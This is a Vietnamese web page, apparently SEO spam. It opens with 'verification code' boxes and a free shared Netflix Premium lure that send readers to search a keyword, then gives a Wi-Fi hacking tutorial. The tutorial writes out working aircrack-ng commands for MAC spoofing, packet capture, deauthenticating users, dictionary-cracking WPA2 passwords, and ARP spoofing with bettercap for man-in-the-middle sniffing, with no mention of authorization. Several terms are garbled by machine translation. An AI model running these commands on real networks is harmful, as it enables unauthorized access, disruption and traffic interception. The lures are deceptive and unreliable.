Vì tính chất bảo mật ĐƯỜNG LINK nên chúng tôi cần xác minh bằng CODE*
HƯỚNG DẪN LẤY CODE (CHỈ MẤT 10 GIÂY)
Bước 1: COPY từ khóa bên dưới (hoặc tự ghi nhớ)
hoclaixeotob2.com
Bước 2: Vào google.com.vn và tìm từ khóa. Sau đó, nhấp vào kết quả này của trang này
===============================
Vì tính chất bảo mật TÀI KHOẢN nên chúng tôi cần xác minh bằng CODE*
SHARE TK NETFLIX PREMIUM MIỄN PHÍ
Bước 1: COPY từ khóa bên dưới (hoặc tự ghi nhớ)
hoclaixeotob2.com
Bước 2: Vào google.com.vn và tìm từ khóa. Sau đó, nhấp vào kết quả này của trang này.
NETFLIX có ưu điểm gì:
- Tận hưởng phim bản quyền Chất lượng cao độ phân giải 4K, FHD, âm thanh 5.1 và không quảng cáo như các web xem phim lậu.
- Kho phim đồ sộ, các phim MỸ, TÂY BAN NHA, HÀN, TRUNG, NHẬT đều có đủ và 90% phim có Vietsub.
- Cài trên điện thoại, máy tính, tablet, SmartTv, box đều xem được.
WIFI được sử dụng ở mọi nơi từ tại nhà, quán cafe và thậm chí là nơi công cộng. Vậy nên nơi đâu cũng là chỗ lý tưởng để các tin tặc có thể hack Wifi. Vậy nên trong bài viết này, mình sẽ mô phỏng lại quá trình tin tặc hack mật khẩu Wifi bằng Linux để các bạn hiểu được nhé.
- Hệ điều hành Linux dựa trên Debian.
- Laptop và usb WIFI có hỗ trợ “Monitor Mode”. Bạn có thể mua con usb Wifi này.
- Tool aircrack-ng, cài đặt bằng lệnh “apt install aircrack-ng”
- Tool thay đổi địa chỉ MAC. Bạn có thể tải công cụ có sẵn tại đây hoặc đọc bài hướng dẫn tạ tool thay đổi địa chỉ MAC bằng python tại đây.
Thay đổi địa chỉ Mac
Mỗi thành phần của hệ thống đều có một vị trí tĩnh vật lý được phân bổ bởi nhà sản xuất. Vị trí tĩnh này được gọi là địa chỉ MAC (Media get to control). Địa chỉ Mac được sử dụng để nhận ra các tiện ích liên quan đến hệ thống khác vì lý do truyền dữ liệu. Sẽ tốt hơn nếu thay đổi địa chỉ Mac trước khi tấn công wifi. Chúng ta có thể thay đổi nó bằng cách sử dụng macchanger.
Chúng ta cần lấy tên interface:
ip addr showVà thay đổi địa chỉ MAC
$ip link set wlp7s7 down $macchanger -m DD:DD:DD:DD:DD:DD wlp7s9 $ip link set wlp7s7 upĐánh hơi gói wifi
Tất cả các gói sẽ được gửi cho chúng ta, ở chế độ bình thường có tên là “Managed Mode”. Nhưng với tư cách là một lập trình viên, chúng ta phải bắt được các gói wifi. “Oversaw Mode” không thể bắt được gói. Để bắt được gói, chúng ta phải thay đổi chế độ thành “Screen”. Chúng ta sẽ thấy chế độ hiện tại bằng lệnh:
$iwconfig lo no wireless extensions. wlp7s9 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=16 dBmBạn có thể thấy chúng ta đang ở chế độ “Managed. Vì vậy, hãy thay đổi nó thành chế độ “Monitor”:
$airmon-ng start wlp7s9Chạy lại lệnh iwconfig, nó sẽ hiển thị “Mode: Monitor” và interface hiện tại là “wlp7s9mon”.
Bắt gói tin
Airodump-ng là một sản phẩm thuộc nhóm Aircrack-ng. Việc bắt từng gói tin có thể được thực hiện bằng cách sử dụng parcel sniffer. Chúng ta phải lọc tất cả các mạng wifi.
Như bây giờ, chúng ta sẽ bắt được gói. Trước tiên, chúng ta cần nhận biết số lượng AP (Điểm truy cập) xung quanh chúng ta:
$airodump-ng wlp7s7mon BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID BB:12:FF:38:BB:88 -46 6 0 0 5 260 WPA2 CCMP PSK Hacked $airodump-ng --bssid BB:12:FF:38:BB:88 --channel 5--write Hacked.cap wlp7s9monNgắt kết nối client
Vấn đề là chúng ta phải đợi cho đến khi một khách hàng mới truy cập vào AP. Chúng ta không biết khi nào ai đó sẽ kết nối. Để làm cho công việc dễ dàng hơn, chúng ta có thể hủy xác thực mọi khách hàng/người dùng. Cuộc tấn công này sẽ ngắt kết nối tất cả mọi người khỏi wifi đang truy cập.
$aireplay-ng --deauth 100 -a BB:12:FF:38:BB:88 -c DD:DD:DD:DD:DD:DD wlp7s9monLệnh này sẽ ngắt kết nối người đó khỏi quyền truy cập wifi trong một thời gian và người đó sẽ sớm kết nối lại.
Sử dụng Dictionary Attack
Đã đến lúc bẻ khóa mật khẩu. Chúng ta chỉ cần một tệp “Hacked.cap-01”
Để bẻ khóa mật khẩu, bạn cần có một tệp danh sách mật khẩu để thực hiện phương pháp tấn công từ điển (dictionary attack).
$aircrack-ng Hacked.cap-01 -w Hack_Password.txt Aircrack-ng 1.5.2Chúng ta vừa tìm thấy mật khẩu. Bây giờ chúng ta sẽ có thể kết nối với wifi.
Mật khẩu wifi đã bị tấn công, rồi sao nữa?
Sau khi kết nối được với AP, chúng tôi có thể tìm thấy tất cả địa chỉ được liên kết với mạng này.
Trong trường hợp chúng ta chạy lệnh “arp – a”, tại thời điểm đó chúng ta sẽ có thể xem tất cả các địa chỉ IP và MAC được liên kết.
Chúng ta có thể sử dụng bettercap để đánh giá lưu lượng truy cập.
./bettercap bettercap v2.26.1 (được xây dựng cho Linux amd64 với go1.11.6) [nhập ‘help’ để biết danh sách các lệnh]
192.168.8.0/24 > 192.168.8.4 » net.sniff on 192.168.8.0/24 > 192.168.8.4 » arp.spoof on 192.168.8.0/24 > 192.168.8.4 » [02:39:24] [net.sniff.dns] dnsChúng ta có thể thực hiện một số cuộc tấn công nâng cao hơn sau khi kết nối với điểm truy cập như tấn công MITM.